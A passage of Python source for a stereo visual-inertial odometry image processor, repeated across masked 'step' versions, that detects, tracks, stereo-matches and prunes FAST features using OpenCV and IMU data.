self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error > self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, 
rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
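The grid bookkeeping in initialize_first_frame and add_new_features above assigns every feature a flat bucket index code = row * grid_col + col from its cam0 pixel position. A standalone sketch of that scheme (grid layout and image size here are invented for illustration, not read from any config):

import numpy as np

grid_row, grid_col = 4, 5    # illustrative grid layout
img_h, img_w = 480, 752      # illustrative image size
grid_h = int(np.ceil(img_h / grid_row))
grid_w = int(np.ceil(img_w / grid_col))

def grid_code(pt):
    # Same row-major flattening used by the tracker: row * grid_col + col.
    return int(pt[1] / grid_h) * grid_col + int(pt[0] / grid_w)

buckets = [[] for _ in range(grid_row * grid_col)]
for pt in [(10.0, 20.0), (700.0, 400.0)]:
    buckets[grid_code(pt)].append(pt)
assert grid_code((0.0, 0.0)) == 0
assert grid_code((751.0, 479.0)) == grid_row * grid_col - 1

Bounding the feature count per bucket, as prune_features does, is what keeps detections spread uniformly over the image instead of clustering in high-texture regions.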
"step-3": "<mask token>\n\n\nclass FeatureMeasurement(object):\n <mask token>\n\n def __init__(self):\n self.id = None\n self.u0 = None\n self.v0 = None\n self.u1 = None\n self.v1 = None\n\n\nclass ImageProcessor(object):\n \"\"\"\n Detect and track features in image sequences.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n new_features 
= self.detector.detect(img)\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers = [], []\n response_inliers = []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def track_features(self):\n \"\"\"\n Tracker features on the newly received stereo images.\n \"\"\"\n img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(img)\n cam0_R_p_c, cam1_R_p_c = self.integrate_imu_data()\n prev_ids = []\n prev_lifetime = []\n prev_cam0_points = []\n prev_cam1_points = []\n for feature in chain.from_iterable(self.prev_features):\n prev_ids.append(feature.id)\n prev_lifetime.append(feature.lifetime)\n prev_cam0_points.append(feature.cam0_point)\n prev_cam1_points.append(feature.cam1_point)\n prev_cam0_points = np.array(prev_cam0_points, dtype=np.float32)\n self.num_features['before_tracking'] = len(prev_cam0_points)\n if len(prev_cam0_points) == 0:\n return\n curr_cam0_points = self.predict_feature_tracking(prev_cam0_points,\n cam0_R_p_c, self.cam0_intrinsics)\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(self.\n prev_cam0_pyramid, self.curr_cam0_pyramid, prev_cam0_points.\n astype(np.float32), curr_cam0_points.astype(np.float32), **self\n .config.lk_params)\n for i, point in enumerate(curr_cam0_points):\n if not track_inliers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n track_inliers[i] = 0\n prev_tracked_ids = select(prev_ids, track_inliers)\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\n curr_cam1_points, match_inliers = self.stereo_match(\n curr_tracked_cam0_points)\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\n prev_matched_cam0_points = select(prev_tracked_cam0_points,\n match_inliers)\n prev_matched_cam1_points = select(prev_tracked_cam1_points,\n match_inliers)\n curr_matched_cam0_points = select(curr_tracked_cam0_points,\n match_inliers)\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\n 
cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\n after_ransac = 0\n for i in range(len(cam0_ransac_inliers)):\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\n continue\n row = int(curr_matched_cam0_points[i][1] / grid_height)\n col = int(curr_matched_cam0_points[i][0] / grid_width)\n code = row * self.config.grid_col + col\n grid_new_feature = FeatureMetaData()\n grid_new_feature.id = prev_matched_ids[i]\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\n prev_matched_lifetime[i] += 1\n self.curr_features[code].append(grid_new_feature)\n after_ransac += 1\n self.num_features['after_ransac'] = after_ransac\n\n def add_new_features(self):\n \"\"\"\n Detect new features on the image to ensure that the features are \n uniformly distributed on the image.\n \"\"\"\n curr_img = self.cam0_curr_img_msg.image\n grid_height, grid_width = self.get_grid_size(curr_img)\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\n for feature in chain.from_iterable(self.curr_features):\n x, y = map(int, feature.cam0_point)\n mask[y - 3:y + 4, x - 3:x + 4] = 0\n new_features = self.detector.detect(curr_img, mask=mask)\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\n for feature in new_features:\n row = int(feature.pt[1] / grid_height)\n col = int(feature.pt[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature_sieve[code].append(feature)\n new_features = []\n for features in new_feature_sieve:\n if len(features) > self.config.grid_max_feature_num:\n features = sorted(features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_max_feature_num]\n new_features.append(features)\n new_features = list(chain.from_iterable(new_features))\n cam0_points = [kp.pt for kp in new_features]\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\n for i, inlier in enumerate(inlier_markers):\n if not inlier:\n continue\n cam0_inliers.append(cam0_points[i])\n cam1_inliers.append(cam1_points[i])\n response_inliers.append(new_features[i].response)\n grid_new_features = [[] for _ in range(self.config.grid_num)]\n for i in range(len(cam0_inliers)):\n cam0_point = cam0_inliers[i]\n cam1_point = cam1_inliers[i]\n response = response_inliers[i]\n row = int(cam0_point[1] / grid_height)\n col = int(cam0_point[0] / grid_width)\n code = row * self.config.grid_col + col\n new_feature = FeatureMetaData()\n new_feature.response = response\n new_feature.cam0_point = cam0_point\n new_feature.cam1_point = cam1_point\n grid_new_features[code].append(new_feature)\n for i, new_features in enumerate(grid_new_features):\n for feature in sorted(new_features, key=lambda x: x.response,\n reverse=True)[:self.config.grid_min_feature_num]:\n self.curr_features[i].append(feature)\n self.curr_features[i][-1].id = self.next_feature_id\n self.curr_features[i][-1].lifetime = 1\n self.next_feature_id += 1\n\n def prune_features(self):\n \"\"\"\n Remove some of the features of a grid in case there are too many \n features inside of that grid, which ensures the number of features \n within each grid is bounded.\n \"\"\"\n for i, features in enumerate(self.curr_features):\n if len(features) <= self.config.grid_max_feature_num:\n continue\n self.curr_features[i] = sorted(features, key=lambda x: x.\n lifetime, reverse=True)[:self.config.grid_max_feature_num]\n\n def load_features(self):\n filename = 
self.config.result_dir + str(self.image_id) + '.npz'\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\n self.image_id += 1\n\n def save_features(self):\n filename = self.config.result_dir + str(self.image_id) + '.npz'\n np.savez(filename, self.curr_features)\n self.image_id += 1\n\n def publish(self):\n \"\"\"\n Publish the features on the current image including both the \n tracked and newly detected ones.\n \"\"\"\n curr_ids = []\n curr_cam0_points = []\n curr_cam1_points = []\n for feature in chain.from_iterable(self.curr_features):\n curr_ids.append(feature.id)\n curr_cam0_points.append(feature.cam0_point)\n curr_cam1_points.append(feature.cam1_point)\n curr_cam0_points_undistorted = self.undistort_points(curr_cam0_points,\n self.cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n curr_cam1_points_undistorted = self.undistort_points(curr_cam1_points,\n self.cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n features = []\n for i in range(len(curr_ids)):\n fm = FeatureMeasurement()\n fm.id = curr_ids[i]\n fm.u0 = curr_cam0_points_undistorted[i][0]\n fm.v0 = curr_cam0_points_undistorted[i][1]\n fm.u1 = curr_cam1_points_undistorted[i][0]\n fm.v1 = curr_cam1_points_undistorted[i][1]\n features.append(fm)\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(self\n .cam0_curr_img_msg.timestamp, features)\n return feature_msg\n\n def integrate_imu_data(self):\n \"\"\"\n Integrates the IMU gyro readings between the two consecutive images, \n which is used for both tracking prediction and 2-point RANSAC.\n\n Returns:\n cam0_R_p_c: a rotation matrix which takes a vector from previous \n cam0 frame to current cam0 frame.\n cam1_R_p_c: a rotation matrix which takes a vector from previous \n cam1 frame to current cam1 frame.\n \"\"\"\n idx_begin = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\n idx_begin = i\n break\n idx_end = None\n for i, msg in enumerate(self.imu_msg_buffer):\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\n idx_end = i\n break\n if idx_begin is None or idx_end is None:\n return np.identity(3), np.identity(3)\n mean_ang_vel = np.zeros(3)\n for i in range(idx_begin, idx_end):\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\n if idx_end > idx_begin:\n mean_ang_vel /= idx_end - idx_begin\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\n dt = (self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.\n timestamp)\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\n return cam0_R_p_c, cam1_R_p_c\n\n def rescale_points(self, pts1, pts2):\n \"\"\"\n Arguments:\n pts1: first set of points.\n pts2: second set of points.\n\n Returns:\n pts1: scaled first set of points.\n pts2: scaled second set of points.\n scaling_factor: scaling factor\n \"\"\"\n scaling_factor = 0\n for pt1, pt2 in zip(pts1, pts2):\n scaling_factor += np.linalg.norm(pt1)\n scaling_factor += np.linalg.norm(pt2)\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\n for i in range(len(pts1)):\n pts1[i] *= scaling_factor\n pts2[i] *= scaling_factor\n return pts1, pts2, scaling_factor\n\n def get_grid_size(self, img):\n \"\"\"\n # Size of each grid.\n \"\"\"\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\n grid_width = 
int(np.ceil(img.shape[1] / self.config.grid_col))\n return grid_height, grid_width\n\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\n \"\"\"\n predictFeatureTracking Compensates the rotation between consecutive \n camera frames so that feature tracking would be more robust and fast.\n\n Arguments:\n input_pts: features in the previous image to be tracked.\n R_p_c: a rotation matrix takes a vector in the previous camera \n frame to the current camera frame. (matrix33)\n intrinsics: intrinsic matrix of the camera. (vec3)\n\n Returns:\n compensated_pts: predicted locations of the features in the \n current image based on the provided rotation.\n \"\"\"\n if len(input_pts) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n H = K @ R_p_c @ np.linalg.inv(K)\n compensated_pts = []\n for i in range(len(input_pts)):\n p1 = np.array([*input_pts[i], 1.0])\n p2 = H @ p1\n compensated_pts.append(p2[:2] / p2[2])\n return np.array(compensated_pts, dtype=np.float32)\n\n def stereo_match(self, cam0_points):\n \"\"\"\n Matches features with stereo image pairs.\n\n Arguments:\n cam0_points: points in the primary image.\n\n Returns:\n cam1_points: points in the secondary image.\n inlier_markers: 1 if the match is valid, 0 otherwise.\n \"\"\"\n cam0_points = np.array(cam0_points)\n if len(cam0_points) == 0:\n return []\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs, R_cam0_cam1)\n cam1_points = self.distort_points(cam0_points_undistorted, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n cam1_points_copy = cam1_points.copy()\n cam0_points = cam0_points.astype(np.float32)\n cam1_points = cam1_points.astype(np.float32)\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam0_pyramid, self.curr_cam1_pyramid, cam0_points,\n cam1_points, **self.config.lk_params)\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(self.\n curr_cam1_pyramid, self.curr_cam0_pyramid, cam1_points,\n cam0_points.copy(), **self.config.lk_params)\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\n inlier_markers = np.logical_and.reduce([inlier_markers.reshape(-1),\n err < 3, disparity < 20])\n img = self.cam1_curr_img_msg.image\n for i, point in enumerate(cam1_points):\n if not inlier_markers[i]:\n continue\n if point[0] < 0 or point[0] > img.shape[1] - 1 or point[1\n ] < 0 or point[1] > img.shape[0] - 1:\n inlier_markers[i] = 0\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\n E = skew(t_cam0_cam1) @ R_cam0_cam1\n cam0_points_undistorted = self.undistort_points(cam0_points, self.\n cam0_intrinsics, self.cam0_distortion_model, self.\n cam0_distortion_coeffs)\n cam1_points_undistorted = self.undistort_points(cam1_points, self.\n cam1_intrinsics, self.cam1_distortion_model, self.\n cam1_distortion_coeffs)\n norm_pixel_unit = 4.0 / (self.cam0_intrinsics[0] + self.\n cam0_intrinsics[1] + self.cam1_intrinsics[0] + self.\n cam1_intrinsics[1])\n for i in range(len(cam0_points_undistorted)):\n if not inlier_markers[i]:\n continue\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\n epipolar_line = E @ pt0\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\n epipolar_line[:2])\n if error 
> self.config.stereo_threshold * norm_pixel_unit:\n inlier_markers[i] = 0\n return cam1_points, inlier_markers\n\n def undistort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs, rectification_matrix=np.identity(3),\n new_intrinsics=np.array([1, 1, 0, 0])):\n \"\"\"\n Arguments:\n pts_in: points to be undistorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n rectification_matrix:\n new_intrinsics:\n\n Returns:\n pts_out: undistorted points.\n \"\"\"\n if len(pts_in) == 0:\n return []\n pts_in = np.reshape(pts_in, (-1, 1, 2))\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n K_new = np.array([[new_intrinsics[0], 0.0, new_intrinsics[2]], [0.0,\n new_intrinsics[1], new_intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.undistortPoints(pts_in, K,\n distortion_coeffs, rectification_matrix, K_new)\n else:\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs,\n None, rectification_matrix, K_new)\n return pts_out.reshape((-1, 2))\n\n def distort_points(self, pts_in, intrinsics, distortion_model,\n distortion_coeffs):\n \"\"\"\n Arguments:\n pts_in: points to be distorted.\n intrinsics: intrinsics of the camera.\n distortion_model: distortion model of the camera.\n distortion_coeffs: distortion coefficients.\n\n Returns:\n pts_out: distorted points. (N, 2)\n \"\"\"\n if len(pts_in) == 0:\n return []\n K = np.array([[intrinsics[0], 0.0, intrinsics[2]], [0.0, intrinsics\n [1], intrinsics[3]], [0.0, 0.0, 1.0]])\n if distortion_model == 'equidistant':\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\n else:\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\n pts_out, _ = cv2.projectPoints(homogenous_pts, np.zeros(3), np.\n zeros(3), K, distortion_coeffs)\n return pts_out.reshape((-1, 2))\n\n def draw_features_stereo(self):\n img0 = self.cam0_curr_img_msg.image\n img1 = self.cam1_curr_img_msg.image\n kps0 = []\n kps1 = []\n matches = []\n for feature in chain.from_iterable(self.curr_features):\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\n cv2.imshow('stereo features', img)\n cv2.waitKey(1)\n\n\n<mask token>\n",
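predict_feature_tracking above warps each previous pixel by the infinite homography H = K @ R_p_c @ inv(K) built from the gyro-integrated rotation. A small numeric sanity check of that identity (intrinsics are illustrative; with zero inter-frame rotation the predicted pixel must equal the input):

import numpy as np

fx, fy, cx, cy = 458.0, 457.0, 367.0, 248.0  # illustrative intrinsics
K = np.array([[fx, 0.0, cx], [0.0, fy, cy], [0.0, 0.0, 1.0]])
R_p_c = np.identity(3)  # assumed: no rotation between consecutive frames
H = K @ R_p_c @ np.linalg.inv(K)
p1 = np.array([100.0, 120.0, 1.0])
p2 = H @ p1
assert np.allclose(p2[:2] / p2[2], p1[:2])

Seeding calcOpticalFlowPyrLK with these rotation-compensated positions shrinks the search window the pyramidal LK step has to cover.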
"step-4": "<mask token>\n\n\nclass FeatureMetaData(object):\n <mask token>\n <mask token>\n\n\nclass FeatureMeasurement(object):\n \"\"\"\n Stereo measurement of a feature.\n \"\"\"\n\n def __init__(self):\n self.id = None\n self.u0 = None\n self.v0 = None\n self.u1 = None\n self.v1 = None\n\n\nclass ImageProcessor(object):\n \"\"\"\n Detect and track features in image sequences.\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n self.is_first_img = True\n self.next_feature_id = 0\n self.detector = cv2.FastFeatureDetector_create(self.config.\n fast_threshold)\n self.imu_msg_buffer = []\n self.cam0_prev_img_msg = None\n self.cam0_curr_img_msg = None\n self.cam1_curr_img_msg = None\n self.prev_cam0_pyramid = None\n self.curr_cam0_pyramid = None\n self.curr_cam1_pyramid = None\n self.prev_features = [[] for _ in range(self.config.grid_num)]\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n self.num_features = defaultdict(int)\n self.cam0_resolution = config.cam0_resolution\n self.cam0_intrinsics = config.cam0_intrinsics\n self.cam0_distortion_model = config.cam0_distortion_model\n self.cam0_distortion_coeffs = config.cam0_distortion_coeffs\n self.cam1_resolution = config.cam1_resolution\n self.cam1_intrinsics = config.cam1_intrinsics\n self.cam1_distortion_model = config.cam1_distortion_model\n self.cam1_distortion_coeffs = config.cam1_distortion_coeffs\n self.T_cam0_imu = np.linalg.inv(config.T_imu_cam0)\n self.R_cam0_imu = self.T_cam0_imu[:3, :3]\n self.t_cam0_imu = self.T_cam0_imu[:3, 3]\n self.T_cam1_imu = np.linalg.inv(config.T_imu_cam1)\n self.R_cam1_imu = self.T_cam1_imu[:3, :3]\n self.t_cam1_imu = self.T_cam1_imu[:3, 3]\n self.image_id = 0\n\n def stereo_callback(self, stereo_msg):\n \"\"\"\n Callback function for the stereo images.\n \"\"\"\n start = time.time()\n self.cam0_curr_img_msg = stereo_msg.cam0_msg\n self.cam1_curr_img_msg = stereo_msg.cam1_msg\n self.create_image_pyramids()\n if self.is_first_img:\n if not self.config.load_features_flag:\n self.initialize_first_frame()\n self.is_first_img = False\n elif not self.config.load_features_flag:\n t = time.time()\n self.track_features()\n print('___track_features:', time.time() - t)\n t = time.time()\n self.add_new_features()\n print('___add_new_features:', time.time() - t)\n t = time.time()\n self.prune_features()\n print('___prune_features:', time.time() - t)\n t = time.time()\n print('___draw_features_stereo:', time.time() - t)\n t = time.time()\n print('===image process elapsed:', time.time() - start,\n f'({stereo_msg.timestamp})')\n if not self.config.load_features_flag:\n try:\n self.save_features()\n return self.publish()\n finally:\n self.cam0_prev_img_msg = self.cam0_curr_img_msg\n self.prev_features = self.curr_features\n self.prev_cam0_pyramid = self.curr_cam0_pyramid\n self.curr_features = [[] for _ in range(self.config.grid_num)]\n else:\n self.load_features()\n return self.publish()\n\n def imu_callback(self, msg):\n \"\"\"\n Callback function for the imu message.\n \"\"\"\n self.imu_msg_buffer.append(msg)\n\n def create_image_pyramids(self):\n \"\"\"\n Create image pyramids used for KLT tracking.\n (Seems doesn't work in python)\n \"\"\"\n curr_cam0_img = self.cam0_curr_img_msg.image\n self.curr_cam0_pyramid = curr_cam0_img\n curr_cam1_img = self.cam1_curr_img_msg.image\n self.curr_cam1_pyramid = curr_cam1_img\n\n def initialize_first_frame(self):\n \"\"\"\n Initialize the image processing sequence, which is basically detect \n new features on the first set of stereo images.\n 
